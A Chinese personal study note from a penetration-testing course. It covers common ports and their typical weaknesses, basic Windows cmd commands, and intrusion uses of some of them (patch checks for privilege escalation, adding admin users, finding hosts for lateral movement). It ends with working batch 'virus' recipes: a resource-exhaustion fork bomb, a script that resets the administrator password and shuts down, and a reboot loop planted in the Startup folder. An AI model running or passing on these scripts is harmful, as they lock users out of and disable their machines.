声明
学习内容来自 B站 up 主《泷羽 sec》,如涉及侵权等问题,请及时联系,本人将马上删除文章。在此郑重声明,文章仅限于交流学习,任何其他违法行为与本人及泷羽 sec 无关。请务必遵守法律法规,切莫越过法律红线,否则后果自负(自学用,防忘记,不喜勿喷)。
1.常见端口对应的服务
ftp 21
telent 23
80 web
80-89 可能是web
443 ssl心脏滴血漏洞
445 smb
1521 oracle
2082/2083 cpanel 主机管理系统登录(国外居多)
2222 虚拟主机管理系统登录(国外居多)
3128 squid代理默认端口-漫游内网
3306 mysql
3312/3311 kangle主机管理系统登录
3389 远程桌面
5432 postgreSQL
5900 vnc
6739 redis(未授权)
7001,7002 weblogic 默认弱口令,反序列化
7778 kloxo 主机控制面板登录
8000-9090 一些常见的web端口一些运维喜欢把管理后台开这些非80端口上
8080 tomact,wdcp主机管理系统,默认弱口令
8080,8089,9090 jboss
8083 vestacp 主机管理系统(国外较多)
8649 genglia
8888 宝塔 主机管理默认端口
10000 virtuamin/webmin服务器虚拟主机管理系统
11211 memcache 未授权访问
27017 ,27018 mongdb(未授权)
28017 MongoDB统计系统页面
2.常用的cmd命令
1.echo
echo /? (查看echo的帮助提示)
echo 1 (输出1)
echo 1 >1.txt (输出1并重定向到1.txt文件)
echo 456789 >>1.txt (追加内容到1.txt文件)
如果再用 他就会把文件覆盖掉,中文就是输出的意思
2.dir (显示当前目录的文件)
3.切换目录 盘符加冒号
d: c: 切换到D盘或者C盘
cd .(进入当面目录)
cd .. (胡推到上一目录)
cd /文件夹
cd desktop (进入到桌面)
4. .tree(文件树状图)
tree /?(查看帮助文档)
tree /F (显示每个文件夹中的名称)
tree /a (使用ASCII字符而不使用扩展字符)
tree C:\User\Administrator /f
tree C:\User\Administrator /a
5.md创建目录和rd删除目录
md是mkdir 得缩写作用相同
rd 删除
tab 补全功能
6. ipconfig (显示当前的网络状态 IP配置 )ipconfig/a (all)查看全部的信息
7.cls (清屏)
8.copy(复制拼接文件)
copy /? (查看帮助文档)
copy 1.txt ..\ 1.txt (把文件1.txt复制到上一目录)
9.move (文件移动)
move ..\1.txt 4.txt (把上一级目录中的1.txt移动到本级目录并重命名为4.txt)
10.ren(重命名)
ren 4.txt 5.txt(把4重命名为5.txt)
11.del(删除)
del 1.txt 2.txt 3.txt(删除1.2.3.txt文件)这个命令删除的文件是永久删除不会进入回收站
12. ping(一般用于探测主机ip是否存活)
ping \?(查看帮助文档)
-t (一直ping)
13.type (显示文本文件的内容)
首先用 echo yuanshenqidong >> 1.txt
type 1.txt (查看文件内容)
14.reg(注册表)
reg /? (查看帮助文档)
15.nslookup (探测域名信息)
nslookup www.baidu.com
nslookup -d www.baidu.com(查看历史解析记录)
16.find(查找)
find /? (查看帮助文档)
现在1.txt中输入字符串,find“a” 1.txt (在1.txt中查找带a的字段)
find /n "a" 1.txt(查找a参数的字段并排序行号)
type与find结合使用 使用type1.txt | find/n "a" (查看1.txt的内容并处带有a参数的字段并排序行号)
17. tasklist (任务列表,显示出当前进程名称等信息)
18.taskkill(杀死进程)
taskkill /?(查看帮助文档)
常用一般是 -pid 和-f -t
演示:首先clac开启一个计算机进程,用tasklist查看进程 然后taskkill /pid 2624,如遇到杀不掉的进程加上 /f 参数
19.ver,winver(显示版本号)
20.start(启动 开始命令)
start cmd(打开cmd)
start calc (开启计算器)
start ping www.baidu.com -t (启动ping并执行-t参数)
21.systeminfo(查看整个系统的信息)查看一些比较重要的信息比如说补丁信息,到后期提权针对一些不同的修补程序进行提权,例如少打了那些补丁我们就用少打的补丁进行提权(溢出系统提权)
22.logoff(注销)
logoff /? (查看帮助文档)
logoff(注销,后期提权成功的情况下要远程登录3389桌面有可能有的机器是连接状态,我们可以用这个命令把对方的登录注销掉)
23.shutdown(关机)/s /f /t /a /r /g /l
shutdown /? (查看帮助文档)
shutdown /s (在1分钟内关机)
shutdown /a (计划取消)
shutdown /r (重启)
shutdown /g (在一分钟内关机)
shutdown /r /t 0 (设置时间设置为0立即执行)
24.telent (协议工具)
控制面板- 程序- 打开或者关闭Windows功能-telent 客户端勾选
telent(在之前shodan中cisco设备就是基于此)
25.arp(自己ip和物理机的映射关系表)
arp /? (查看帮助文档)
arp -a (假设拿到以太内网机器通过这条可以查看当前内网有哪些主机有助于横向移动,用于发现统一网络有哪些主机)
26.at (定时任务)
eg:(定时关机) at 时间 “shutdown (关机)/r /t 0”
取消命令 at 1 /delete
27.net(服务)(需要以管理员身份运行cmd)
net stop telnet (关闭telnet)
net start telent (开启telent)
net user(查看当前用户)
net user aikun 123(添加用户名admin 密码123得用户)
net localgroup administrator admin /add (提权)
net user aikun(查看admin用户权限)
net user aikun /delete
资源耗尽病毒
bat(脚本 文件后缀名.bat)
耗尽资源的bat病毒
echo start cmd > 1.txt
echo %0 >> 1.txt (%0 -%9表示命令行参数,%0表示bat文件名本身,%1-%9表示其后的参数,如%0的话就是一直执行这个bat本身,那我们这儿本身就是一直start cmd 从而造成资源耗尽)
ren 1.txt 1.bat
锁机病毒
echo net user administrator 123456 > c:\windows\Temp\1.bat
- 功能:这条命令创建一个批处理文件
1.bat,并在文件中写入net user administrator 123456。- 作用:
net user命令用于管理用户账户。在这里,它将管理员账户的密码设置为123456。使用>表示创建或覆盖文件。
echo shutdown /s /t 0 >> c:\windows\Temp\1.bat
- 功能:这条命令将
shutdown /s /t 0追加到1.bat文件中。- 作用:
shutdown命令用于关闭计算机。/s表示关机,/t 0指定了关闭前的等待时间为 0 秒,意味着计算机会立即关闭。使用>>表示追加内容到文件中,而不是覆盖
无限重启病毒
echo shutdown /s /t 0 > c:\windows\Temp\1.bat
echo:命令,用于将后面的文本输出到文件或控制台。shutdown:命令,用于关闭计算机。/s:参数,表示执行关机操作。/t 0:参数,表示在 0 秒后关机。这意味着计算机将立即关闭。>:输出重定向符,表示将前面的输出写入到指定文件中。如果文件已存在,则会覆盖。c:\windows\Temp\1.bat:指定的文件路径,用于存储创建的批处理文件copy c:\windows\Temp\1.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Start\Menu\Programs\startup\"
copy:命令,用于复制文件。c:\windows\Temp\1.bat:源文件路径,表示要复制的文件。"%USERPROFILE%\AppData\Roaming\Microsoft\Start\Menu\Programs\startup\":目标路径,表示要将文件复制到的启动文件夹。%USERPROFILE%是一个环境变量,表示当前用户的个人文件夹路径,确保复制到正确的用户目录。
windows 系统目录接管与渗透的关系
"%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\"
(开机自启目录)
c:\windows\Temp\1.bat (重启自动清空缓存)